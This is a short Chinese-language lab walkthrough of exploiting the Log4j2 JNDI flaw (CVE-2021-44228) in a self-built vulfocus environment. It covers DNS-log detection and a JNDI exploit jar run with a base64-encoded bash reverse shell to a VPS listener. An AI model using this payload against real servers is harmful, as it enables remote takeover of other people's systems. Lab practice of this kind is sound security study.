log4j2-CVE-2021-44228
漏洞環境是在自己搭建的vulfocus中做的。
打開漏洞環境之后,訪問鏈接。
他的注入位置在/hello目錄下的一個payload位置,並且是get提交的數據。
我們直接訪問點擊這三個問號,並抓包,我們就可以在這個payload位置注入我們的exp。
可以在dnslog.cn中獲得一個子域名,驗證一下是否存在該漏洞。
這里需要進行url編碼一下,要不然返回404。發送,之后就可以在dnslog.cn中看到記錄。
直接利用:用JNDI注入:(遠程方法調用)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4xMDAvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.100.100
首先要下載這個exp,下載到自己的vps中,敲上面的對應命令,就會返回:下面內容。
在vps中打開一個頁面,監聽我們的對應的端口。(這里用了監聽成功的圖)
之后就直接輸入我們的payload。注意這里的rmi,
vps中就會反彈shell成功。
途中查看大佬的wp: 膜拜!
https://www.cnblogs.com/loongten/p/15822195.html